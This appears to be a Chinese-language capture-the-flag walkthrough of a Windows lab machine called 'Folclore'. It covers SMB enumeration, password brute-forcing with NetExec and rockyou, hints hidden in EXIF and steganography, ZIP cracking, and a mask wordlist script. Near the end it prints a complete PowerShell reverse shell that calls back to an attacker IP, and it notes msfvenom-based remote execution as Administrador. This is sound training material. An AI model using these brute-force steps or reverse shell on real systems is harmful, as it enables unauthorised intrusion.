Nmap #
[root@Hacking] /home/kali/Folclore
❯ nmap 192.168.26.15 -A -p-
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
MAC Address: 08:00:27:EE:0F:0E (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 11|10|2008 (98%)
OS CPE: cpe:/o:microsoft:windows_11 cpe:/o:microsoft:windows_10 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2
Aggressive OS guesses: Microsoft Windows 11 (98%), Microsoft Windows 10 1903 - 21H1 (91%), Microsoft Windows 10 1803 (89%), Microsoft Windows Server 2008 SP1 or Windows Server 2008 R2 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: FOLCLORE, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:ee:0f:0e (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
| smb2-time:
| date: 2025-09-02T13:07:21
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 0.28 ms 192.168.26.15
只开了smb服务
SMB #
[root@Hacking] /home/kali/Folclore
❯ NetExec smb 192.168.26.15 -u guest -p '' --shares
SMB 192.168.26.15 445 FOLCLORE [*] Windows 10 / Server 2019 Build 19041 (name:FOLCLORE) (domain:Folclore) (signing:False) (SMBv1:False)
SMB 192.168.26.15 445 FOLCLORE [+] Folclore\guest: (Guest)
SMB 192.168.26.15 445 FOLCLORE [*] Enumerated shares
SMB 192.168.26.15 445 FOLCLORE Share Permissions Remark
SMB 192.168.26.15 445 FOLCLORE ----- ----------- ------
SMB 192.168.26.15 445 FOLCLORE ADMIN$ Admin remota
SMB 192.168.26.15 445 FOLCLORE C$ Recurso predeterminado
SMB 192.168.26.15 445 FOLCLORE Dia de Muertos Al final, todos somos polvo y hueso.
SMB 192.168.26.15 445 FOLCLORE IPC$ READ IPC remota
SMB 192.168.26.15 445 FOLCLORE Libertad El secreto está en quien se atreve a buscarlo; sigue tu camino sin miedo.
SMB 192.168.26.15 445 FOLCLORE Lluvia Presta atención, pues en esta imagen el camino se revela sólo a quien sabe escuchar el trueno
SMB 192.168.26.15 445 FOLCLORE Oro ¿Buscas llegar a Quetzalcóatl? Aquí inicia tu camino.
SMB 192.168.26.15 445 FOLCLORE Santuario El Refugio de Ixchel
SMB 192.168.26.15 445 FOLCLORE Viento El viento sagrado ejecutará la tarea a su debido tiempo
UserEnum #
[root@Hacking] /home/kali/Folclore
❯ NetExec smb 192.168.26.15 -u guest -p '' --rid-brute
SMB 192.168.26.15 445 FOLCLORE [*] Windows 10 / Server 2019 Build 19041 (name:FOLCLORE) (domain:Folclore) (signing:False) (SMBv1:False)
SMB 192.168.26.15 445 FOLCLORE [+] Folclore\guest: (Guest)
SMB 192.168.26.15 445 FOLCLORE 500: FOLCLORE\Administrador (SidTypeUser)
SMB 192.168.26.15 445 FOLCLORE 501: FOLCLORE\Invitado (SidTypeUser)
SMB 192.168.26.15 445 FOLCLORE 503: FOLCLORE\DefaultAccount (SidTypeUser)
SMB 192.168.26.15 445 FOLCLORE 504: FOLCLORE\WDAGUtilityAccount (SidTypeUser)
SMB 192.168.26.15 445 FOLCLORE 513: FOLCLORE\Ninguno (SidTypeGroup)
SMB 192.168.26.15 445 FOLCLORE 1001: FOLCLORE\Quetzalcoatl (SidTypeUser)
SMB 192.168.26.15 445 FOLCLORE 1003: FOLCLORE\El_charro_negro (SidTypeUser)
SMB 192.168.26.15 445 FOLCLORE 1004: FOLCLORE\Ix_Chel (SidTypeUser)
SMB 192.168.26.15 445 FOLCLORE 1005: FOLCLORE\Tlaloc (SidTypeUser)
SMB 192.168.26.15 445 FOLCLORE 1006: FOLCLORE\La_mulata_de_Cordoba (SidTypeUser)
SMB 192.168.26.15 445 FOLCLORE 1007: FOLCLORE\La_Catrina (SidTypeUser)
Password Brute #
[root@Hacking] /home/kali/Folclore
❯ NetExec smb 192.168.26.15 -u El_charro_negro -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding ⏎
SMB 192.168.26.15 445 FOLCLORE [*] Windows 10 / Server 2019 Build 19041 (name:FOLCLORE) (domain:Folclore) (signing:False) (SMBv1:False)
SMB 192.168.26.15 445 FOLCLORE [-] Folclore\El_charro_negro:123456 STATUS_LOGON_FAILURE
SMB 192.168.26.15 445 FOLCLORE [-] Folclore\El_charro_negro:12345 STATUS_LOGON_FAILURE
SMB 192.168.26.15 445 FOLCLORE [-] Folclore\El_charro_negro:123456789 STATUS_LOGON_FAILURE
SMB 192.168.26.15 445 FOLCLORE [-] Folclore\El_charro_negro:password STATUS_LOGON_FAILURE
SMB 192.168.26.15 445 FOLCLORE [-] Folclore\El_charro_negro:iloveyou STATUS_LOGON_FAILURE
SMB 192.168.26.15 445 FOLCLORE [-] Folclore\El_charro_negro:princess STATUS_LOGON_FAILURE
SMB 192.168.26.15 445 FOLCLORE [-] Folclore\El_charro_negro:1234567 STATUS_LOGON_FAILURE
SMB 192.168.26.15 445 FOLCLORE [-] Folclore\El_charro_negro:rockyou STATUS_LOGON_FAILURE
SMB 192.168.26.15 445 FOLCLORE [-] Folclore\El_charro_negro:12345678 STATUS_LOGON_FAILURE
SMB 192.168.26.15 445 FOLCLORE [+] Folclore\El_charro_negro:abc123
查看一下他的权限
[root@Hacking] /home/kali/Folclore
❯ NetExec smb 192.168.26.15 -u El_charro_negro -p 'abc123' --shares
SMB 192.168.26.15 445 FOLCLORE [*] Windows 10 / Server 2019 Build 19041 (name:FOLCLORE) (domain:Folclore) (signing:False) (SMBv1:False)
SMB 192.168.26.15 445 FOLCLORE [+] Folclore\El_charro_negro:abc123
SMB 192.168.26.15 445 FOLCLORE [*] Enumerated shares
SMB 192.168.26.15 445 FOLCLORE Share Permissions Remark
SMB 192.168.26.15 445 FOLCLORE ----- ----------- ------
SMB 192.168.26.15 445 FOLCLORE ADMIN$ Admin remota
SMB 192.168.26.15 445 FOLCLORE C$ Recurso predeterminado
SMB 192.168.26.15 445 FOLCLORE Dia de Muertos Al final, todos somos polvo y hueso.
SMB 192.168.26.15 445 FOLCLORE IPC$ READ IPC remota
SMB 192.168.26.15 445 FOLCLORE Libertad El secreto está en quien se atreve a buscarlo; sigue tu camino sin miedo.
SMB 192.168.26.15 445 FOLCLORE Lluvia Presta atención, pues en esta imagen el camino se revela sólo a quien sabe escuchar el trueno
SMB 192.168.26.15 445 FOLCLORE Oro READ,WRITE ¿Buscas llegar a Quetzalcóatl? Aquí inicia tu camino.
SMB 192.168.26.15 445 FOLCLORE Santuario El Refugio de Ixchel
SMB 192.168.26.15 445 FOLCLORE Viento El viento sagrado ejecutará la tarea a su debido tiempo
Exiftool #
发现一张图片
[root@Hacking] /home/kali/Folclore
❯ smbclient //192.168.26.15/Oro -U El_charro_negro ⏎
Password for [WORKGROUP\El_charro_negro]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Sep 2 21:16:16 2025
.. D 0 Tue Sep 2 21:16:16 2025
El_Charro_Negro.jpeg A 50061 Tue Jul 29 08:40:26 2025
15581256 blocks of size 4096. 10787385 blocks available
smb: \> get El_Charro_Negro.jpeg
getting file \El_Charro_Negro.jpeg of size 50061 as El_Charro_Negro.jpeg (24442.7 KiloBytes/sec) (average 24443.8 KiloBytes/sec)
smb: \> exit
查看exif
[root@Hacking] /home/kali/Folclore
❯ exiftool El_Charro_Negro.jpeg
ExifTool Version Number : 13.10
File Name : El_Charro_Negro.jpeg
Directory : .
File Size : 50 kB
File Modification Date/Time : 2025:09:02 21:17:09+08:00
File Access Date/Time : 2025:09:02 21:17:09+08:00
File Inode Change Date/Time : 2025:09:02 21:17:09+08:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
Exif Byte Order : Big-endian (Motorola, MM)
Y Cb Cr Positioning : Centered
Copyright : El camino es largo pero no complicado. Busca a Ix Chel; ella tiene la siguiente pista aqui tienes la clave: 4+9Ii1wK
Image Width : 736
Image Height : 981
Encoding Process : Progressive DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 736x981
Megapixels : 0.722
其中copyright的信息
这条路很长,但并不复杂。寻找IX_Chel;她有以下线索你有钥匙:4+9Ii1wK
验证得知就是他的密码
[root@Hacking] /home/kali/Folclore
❯ NetExec smb 192.168.26.15 -u Ix_Chel -p '4+9Ii1wK'
SMB 192.168.26.15 445 FOLCLORE [*] Windows 10 / Server 2019 Build 19041 (name:FOLCLORE) (domain:Folclore) (signing:False) (SMBv1:False)
SMB 192.168.26.15 445 FOLCLORE [+] Folclore\Ix_Chel:4+9Ii1wK
Tlaloc #
再查看权限
[root@Hacking] /home/kali/Folclore
❯ NetExec smb 192.168.26.15 -u Ix_Chel -p '4+9Ii1wK' --shares
SMB 192.168.26.15 445 FOLCLORE [*] Windows 10 / Server 2019 Build 19041 (name:FOLCLORE) (domain:Folclore) (signing:False) (SMBv1:False)
SMB 192.168.26.15 445 FOLCLORE [+] Folclore\Ix_Chel:4+9Ii1wK
SMB 192.168.26.15 445 FOLCLORE [*] Enumerated shares
SMB 192.168.26.15 445 FOLCLORE Share Permissions Remark
SMB 192.168.26.15 445 FOLCLORE ----- ----------- ------
SMB 192.168.26.15 445 FOLCLORE ADMIN$ Admin remota
SMB 192.168.26.15 445 FOLCLORE C$ Recurso predeterminado
SMB 192.168.26.15 445 FOLCLORE Dia de Muertos Al final, todos somos polvo y hueso.
SMB 192.168.26.15 445 FOLCLORE IPC$ READ IPC remota
SMB 192.168.26.15 445 FOLCLORE Libertad El secreto está en quien se atreve a buscarlo; sigue tu camino sin miedo.
SMB 192.168.26.15 445 FOLCLORE Lluvia Presta atención, pues en esta imagen el camino se revela sólo a quien sabe escuchar el trueno
SMB 192.168.26.15 445 FOLCLORE Oro ¿Buscas llegar a Quetzalcóatl? Aquí inicia tu camino.
SMB 192.168.26.15 445 FOLCLORE Santuario READ,WRITE El Refugio de Ixchel
SMB 192.168.26.15 445 FOLCLORE Viento El viento sagrado ejecutará la tarea a su debido tiempo
找到一个txt文件
[root@Hacking] /home/kali/Folclore
❯ smbclient //192.168.26.15/Santuario -U Ix_Chel
Password for [WORKGROUP\Ix_Chel]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Sep 2 21:20:52 2025
.. D 0 Tue Sep 2 21:20:52 2025
La clave de Kukulcán.txt A 573 Tue Jul 29 08:59:48 2025
15581256 blocks of size 4096. 10787326 blocks available
smb: \> get "La clave de Kukulcán.txt"
getting file \La clave de Kukulcán.txt of size 573 as La clave de Kukulcán.txt (559.5 KiloBytes/sec) (average 559.6 KiloBytes/sec)
smb: \> exit
查看内容
Recuerdo cuando conocí a Kukulcán, la serpiente emplumada que otros llaman Quetzalcóatl; su mirada guardaba el misterio del viento y la sabiduría, y con una sonrisa me confió que su clave más preciada tenía solo ocho caracteres, sencilla pero poderosa, como él mismo. Nuestros caminos se entrelazan: yo, guardiana de la luna y la vida; él, portador del cielo y el conocimiento, unidos bajo el manto eterno de las estrellas. Ahora, sigue adelante, porque Quetzalcóatl te espera. Continua buscando a Tláloc,te despejare el camino entregándote su clave: 677Kn$q."
我记得当我遇到库库尔坎时,他是一条有羽毛的蛇,别人叫他奎扎尔卡特;他的目光保留了风和智慧的奥秘,他笑着告诉我,他最珍贵的钥匙只有八个字符,简单但强大,就像他自己一样。我们的道路交织在一起:我,月亮和生命的守护者;他是天空和知识的载体,在星星永恒的斗篷下团结在一起。现在,继续前进,因为奎扎尔科特在等你。继续寻找特拉洛克,我会给你他的钥匙:677KN$Q,为你扫清道路。”
又拿到了Tlaloc的密码
Stegseek #
继续看权限
[root@Hacking] /home/kali/Folclore
❯ NetExec smb 192.168.26.15 -u Tlaloc -p '677Kn$q' --shares ⏎
SMB 192.168.26.15 445 FOLCLORE [*] Windows 10 / Server 2019 Build 19041 (name:FOLCLORE) (domain:Folclore) (signing:False) (SMBv1:False)
SMB 192.168.26.15 445 FOLCLORE [+] Folclore\Tlaloc:677Kn$q
SMB 192.168.26.15 445 FOLCLORE [*] Enumerated shares
SMB 192.168.26.15 445 FOLCLORE Share Permissions Remark
SMB 192.168.26.15 445 FOLCLORE ----- ----------- ------
SMB 192.168.26.15 445 FOLCLORE ADMIN$ Admin remota
SMB 192.168.26.15 445 FOLCLORE C$ Recurso predeterminado
SMB 192.168.26.15 445 FOLCLORE Dia de Muertos Al final, todos somos polvo y hueso.
SMB 192.168.26.15 445 FOLCLORE IPC$ READ IPC remota
SMB 192.168.26.15 445 FOLCLORE Libertad El secreto está en quien se atreve a buscarlo; sigue tu camino sin miedo.
SMB 192.168.26.15 445 FOLCLORE Lluvia READ,WRITE Presta atención, pues en esta imagen el camino se revela sólo a quien sabe escuchar el trueno
SMB 192.168.26.15 445 FOLCLORE Oro ¿Buscas llegar a Quetzalcóatl? Aquí inicia tu camino.
SMB 192.168.26.15 445 FOLCLORE Santuario El Refugio de Ixchel
SMB 192.168.26.15 445 FOLCLORE Viento El viento sagrado ejecutará la tarea a su debido tiempo
又找到一张图片
[root@Hacking] /home/kali/Folclore
❯ smbclient //192.168.26.15/Lluvia -U Tlaloc
Password for [WORKGROUP\Tlaloc]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Sep 2 21:25:24 2025
.. D 0 Tue Sep 2 21:25:24 2025
Tlaloc.jpg A 111216 Tue Jul 29 09:35:18 2025
15581256 blocks of size 4096. 10787355 blocks available
smb: \> get Tlaloc.jpg
getting file \Tlaloc.jpg of size 111216 as Tlaloc.jpg (54302.0 KiloBytes/sec) (average 54304.7 KiloBytes/sec)
smb: \> exit
使用stegseek查看
[root@Hacking] /home/kali/Folclore
❯ stegseek Tlaloc.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "knight"
[i] Original filename: "Las primeras señales.txt".
[i] Extracting to "Tlaloc.jpg.out".
[root@Hacking] /home/kali/Folclore
❯ cat Tlaloc.jpg.out
He conseguido estos últimos dos caracteres para la clave de Kukulcán, la serpiente emplumada que llaman Quetzalcóatl: %/. Te los entrego para que completes tu búsqueda. Además, aquí tienes otra clave, aunque debo confesar que no recuerdo a quién pertenece exactamente: 45yD#k7. Confía en tu instinto para usarla sabiamente.
我为库库尔坎的钥匙获得了最后两个字符,他们称之为奎扎尔卡特的羽毛蛇:%/。我把它们交给你是为了完成你的任务。此外,这是另一把钥匙,尽管我必须承认,我不记得它到底属于谁:45yD#k7。相信你的直觉才能明智地使用它。
发现是La_mulata_de_Cordoba用户的
[root@Hacking] /home/kali/Folclore
❯ NetExec smb 192.168.26.15 -u La_mulata_de_Cordoba -p '45yD#k7'
SMB 192.168.26.15 445 FOLCLORE [*] Windows 10 / Server 2019 Build 19041 (name:FOLCLORE) (domain:Folclore) (signing:False) (SMBv1:False)
SMB 192.168.26.15 445 FOLCLORE [+] Folclore\La_mulata_de_Cordoba:45yD#k7
Crack ZIP #
继续查看权限
[root@Hacking] /home/kali/Folclore
❯ NetExec smb 192.168.26.15 -u La_mulata_de_Cordoba -p '45yD#k7' --shares
SMB 192.168.26.15 445 FOLCLORE [*] Windows 10 / Server 2019 Build 19041 (name:FOLCLORE) (domain:Folclore) (signing:False) (SMBv1:False)
SMB 192.168.26.15 445 FOLCLORE [+] Folclore\La_mulata_de_Cordoba:45yD#k7
SMB 192.168.26.15 445 FOLCLORE [*] Enumerated shares
SMB 192.168.26.15 445 FOLCLORE Share Permissions Remark
SMB 192.168.26.15 445 FOLCLORE ----- ----------- ------
SMB 192.168.26.15 445 FOLCLORE ADMIN$ Admin remota
SMB 192.168.26.15 445 FOLCLORE C$ Recurso predeterminado
SMB 192.168.26.15 445 FOLCLORE Dia de Muertos Al final, todos somos polvo y hueso.
SMB 192.168.26.15 445 FOLCLORE IPC$ READ IPC remota
SMB 192.168.26.15 445 FOLCLORE Libertad READ,WRITE El secreto está en quien se atreve a buscarlo; sigue tu camino sin miedo.
SMB 192.168.26.15 445 FOLCLORE Lluvia Presta atención, pues en esta imagen el camino se revela sólo a quien sabe escuchar el trueno
SMB 192.168.26.15 445 FOLCLORE Oro ¿Buscas llegar a Quetzalcóatl? Aquí inicia tu camino.
SMB 192.168.26.15 445 FOLCLORE Santuario El Refugio de Ixchel
SMB 192.168.26.15 445 FOLCLORE Viento El viento sagrado ejecutará la tarea a su debido tiempo
里面有一个txt和一个zip
[root@Hacking] /home/kali/Folclore
❯ smbclient //192.168.26.15/Libertad -U La_mulata_de_Cordoba
Password for [WORKGROUP\La_mulata_de_Cordoba]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Sep 2 21:28:16 2025
.. D 0 Tue Sep 2 21:28:16 2025
Mi_amiga.txt A 169 Tue Jul 29 09:53:49 2025
Pacto.zip A 432 Tue Jul 29 09:49:18 2025
15581256 blocks of size 4096. 10786086 blocks available
smb: \> mget *
Get file Mi_amiga.txt? y
getting file \Mi_amiga.txt of size 169 as Mi_amiga.txt (165.0 KiloBytes/sec) (average 165.0 KiloBytes/sec)
Get file Pacto.zip? y
getting file \Pacto.zip of size 432 as Pacto.zip (421.8 KiloBytes/sec) (average 293.5 KiloBytes/sec)
smb: \> exit
其中Mi_amiga.txt的内容如下
我的朋友“La Catrina”给我留下了她的账户,让我偶尔帮助她做一些小工作。我会在这里写下密码,以免忘记:3Nm93{s#
Pacto.zip被加密过,需要爆破密码
[root@Hacking] /home/kali/Folclore
❯ zip2john Pacto.zip > hash.txt
[root@Hacking] /home/kali/Folclore
❯ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 128/128 AVX 4x])
Cost 1 (HMAC size) is 238 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
celina (Pacto.zip/Pacto.txt)
1g 0:00:00:00 DONE (2025-09-02 21:31) 11.11g/s 91022p/s 91022c/s 91022C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
[root@Hacking] /home/kali/Folclore
❯ 7z x Pacto.zip
7-Zip 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29
64-bit locale=en_US.UTF-8 Threads:32 OPEN_MAX:1024, ASM
Scanning the drive for archives:
1 file, 432 bytes (1 KiB)
Extracting archive: Pacto.zip
--
Path = Pacto.zip
Type = zip
Physical Size = 432
Enter password (will not be echoed):
Everything is Ok
Size: 358
Compressed: 432
[root@Hacking] /home/kali/Folclore
❯ cat Pacto.txt
Has surcado sendas que pocos se atreven a cruzar, pero tu viaje no concluye todavía. Invocando mis artes prohibidas, logré hechizar a la serpiente emplumada y robarle apenas el inicio de su secreto: sólo tres caracteres fui capaz de obtener. Ahora los deposito en tus manos, pero escucha el viento y no olvides la deuda que ahora te ata a mi sombra: J9c.
你走了很少有人敢走的路,但你的旅程还没有结束。通过调用我被禁止的艺术,我成功地对羽蛇施了魔法,并在它秘密的开始就偷走了它:我只能得到三个角色。现在我把它们放在你手中,但请听风的声音,不要忘记现在把你绑在我阴影下的债务:J9c。
Password Brute #
查看La_Catrina用户的权限
[root@Hacking] /home/kali/Folclore
❯ NetExec smb 192.168.26.15 -u La_Catrina -p '3nM93{S#' --shares
SMB 192.168.26.15 445 FOLCLORE [*] Windows 10 / Server 2019 Build 19041 (name:FOLCLORE) (domain:Folclore) (signing:False) (SMBv1:False)
SMB 192.168.26.15 445 FOLCLORE [+] Folclore\La_Catrina:3nM93{S#
SMB 192.168.26.15 445 FOLCLORE [*] Enumerated shares
SMB 192.168.26.15 445 FOLCLORE Share Permissions Remark
SMB 192.168.26.15 445 FOLCLORE ----- ----------- ------
SMB 192.168.26.15 445 FOLCLORE ADMIN$ Admin remota
SMB 192.168.26.15 445 FOLCLORE C$ Recurso predeterminado
SMB 192.168.26.15 445 FOLCLORE Dia de Muertos READ,WRITE Al final, todos somos polvo y hueso.
SMB 192.168.26.15 445 FOLCLORE IPC$ READ IPC remota
SMB 192.168.26.15 445 FOLCLORE Libertad El secreto está en quien se atreve a buscarlo; sigue tu camino sin miedo.
SMB 192.168.26.15 445 FOLCLORE Lluvia Presta atención, pues en esta imagen el camino se revela sólo a quien sabe escuchar el trueno
SMB 192.168.26.15 445 FOLCLORE Oro ¿Buscas llegar a Quetzalcóatl? Aquí inicia tu camino.
SMB 192.168.26.15 445 FOLCLORE Santuario El Refugio de Ixchel
SMB 192.168.26.15 445 FOLCLORE Viento El viento sagrado ejecutará la tarea a su debido tiempo
[root@Hacking] /home/kali/Folclore
❯ smbclient //192.168.26.15/'Dia de Muertos' -U La_Catrina
Password for [WORKGROUP\La_Catrina]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Sep 2 21:34:42 2025
.. D 0 Tue Sep 2 21:34:42 2025
Ultimo_mensaje.txt A 278 Tue Jul 29 10:22:59 2025
15581256 blocks of size 4096. 10784693 blocks available
smb: \> get Ultimo_mensaje.txt
getting file \Ultimo_mensaje.txt of size 278 as Ultimo_mensaje.txt (271.5 KiloBytes/sec) (average 271.5 KiloBytes/sec)
smb: \> exit
[root@Hacking] /home/kali/Folclore
❯ cat Ultimo_mensaje.txt
Solo puedo darte el quinto carácter de su clave: ‘U’. Los demás caracteres que faltan deberás encontrarlos por tu cuenta, aunque no debe ser tan difícil; solo son números o letras. Confía en tu ingenio y no olvides que el misterio siempre se revela a quien persevera.
我只能给你他的密码的第五个字符:“U”。剩下的角色你必须自己找到,尽管这不应该那么困难;只是数字或字母。相信你的聪明才智,不要忘记,神秘总是向坚持的人揭示。
目前看起来密码是类似于J9c?U?%/,其中?需要我们自己爆破吧
import itertools
import string
charset = string.ascii_letters + string.digits + string.punctuation
prefix = "J9C"
middle = "U"
suffix = "%/"
with open("dict.txt", "w") as f:
for c1 in charset:
for c2 in charset:
f.write(f"{prefix}{c1}{middle}{c2}{suffix}\n")
尝试爆破密码
[root@Hacking] /home/kali/Folclore
❯ NetExec smb 192.168.26.15 -u Quetzalcoatl -p dict.txt
[root@Hacking] /home/kali/Folclore
❯ NetExec smb 192.168.26.15 -u Quetzalcoatl -p 'J9c7U7%/' --shares
SMB 192.168.26.15 445 FOLCLORE [*] Windows 10 / Server 2019 Build 19041 (name:FOLCLORE) (domain:Folclore) (signing:False) (SMBv1:False)
SMB 192.168.26.15 445 FOLCLORE [+] Folclore\Quetzalcoatl:J9c7U7%/
SMB 192.168.26.15 445 FOLCLORE [*] Enumerated shares
SMB 192.168.26.15 445 FOLCLORE Share Permissions Remark
SMB 192.168.26.15 445 FOLCLORE ----- ----------- ------
SMB 192.168.26.15 445 FOLCLORE ADMIN$ Admin remota
SMB 192.168.26.15 445 FOLCLORE C$ Recurso predeterminado
SMB 192.168.26.15 445 FOLCLORE Dia de Muertos Al final, todos somos polvo y hueso.
SMB 192.168.26.15 445 FOLCLORE IPC$ READ IPC remota
SMB 192.168.26.15 445 FOLCLORE Libertad El secreto está en quien se atreve a buscarlo; sigue tu camino sin miedo.
SMB 192.168.26.15 445 FOLCLORE Lluvia Presta atención, pues en esta imagen el camino se revela sólo a quien sabe escuchar el trueno
SMB 192.168.26.15 445 FOLCLORE Oro READ ¿Buscas llegar a Quetzalcóatl? Aquí inicia tu camino.
SMB 192.168.26.15 445 FOLCLORE Santuario El Refugio de Ixchel
SMB 192.168.26.15 445 FOLCLORE Viento READ,WRITE El viento sagrado ejecutará la tarea a su debido tiempo
读取到一个txt文件
❯ smbclient //192.168.26.15/Viento -U Quetzalcoatl ⏎
Password for [WORKGROUP\Quetzalcoatl]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Sep 2 21:49:22 2025
.. D 0 Tue Sep 2 21:49:22 2025
Serpiente Emplumada.txt A 432 Tue Jul 29 10:27:08 2025
15581256 blocks of size 4096. 10784372 blocks available
smb: \> get "Serpiente Emplumada.txt"
getting file \Serpiente Emplumada.txt of size 432 as Serpiente Emplumada.txt (421.8 KiloBytes/sec) (average 421.9 KiloBytes/sec)
smb: \> exit
[root@Hacking] /home/kali/Folclore
❯ cat Serpiente\ Emplumada.txt
Has recorrido con valentía y sabiduría un sendero lleno de retos; te felicito, guerrero del destino.
Ahora, confía en mí, Quetzalcóatl, la serpiente emplumada, pues seré yo quien te otorgue el acceso necesario.
Solo ejecutaré una vez aquel archivo PowerShell que decidas subir, para abrir el portal hacia lo que buscas.
Que esta acción sea el puente que te lleve a la verdad escondida entre los vientos y las estrellas.#
你勇敢而明智地走上了一条充满挑战的道路;恭喜你,命运的战士。
现在,相信我,奎扎尔科阿特尔,有羽毛的蛇,因为我会给你必要的通道。
我只会运行一次您决定上传的PowerShell文件,以打开您正在寻找的门户网站。
愿这一行动成为将你带到隐藏在风和星星之间的真相的桥梁。
Upload #
使用下面的payload
$LHOST = "192.168.26.3"; $LPORT = 4444; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()
注意一下这里只会触发一次,失败就要重新导入(或者打个快照)
[root@Hacking] /home/kali/Folclore
❯ smbclient //192.168.26.15/Viento -U Quetzalcoatl ⏎
Password for [WORKGROUP\Quetzalcoatl]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Jul 29 11:50:38 2025
.. D 0 Tue Jul 29 11:50:38 2025
Serpiente Emplumada.txt A 432 Tue Jul 29 10:27:08 2025
15581256 blocks of size 4096. 10734304 blocks available
smb: \> put reverse.ps1
putting file reverse.ps1 as \reverse.ps1 (8.2 kb/s) (average 8.2 kb/s)
smb: \> ls
. D 0 Tue Sep 2 22:04:50 2025
.. D 0 Tue Sep 2 22:04:50 2025
reverse.ps1 A 795 Tue Sep 2 22:04:50 2025
Serpiente Emplumada.txt A 432 Tue Jul 29 10:27:08 2025
15581256 blocks of size 4096. 10733113 blocks available
smb: \>
拿到user.txt
Root #
这里我通过SMB上传了一个msfvenom,将shell转移到了msf,并且在一个文件中找到了管理员的密码
NetExec smb 192.168.26.15 -u Administrador -p 'xxx' -x "C:\SMB\Viento\evil.exe"
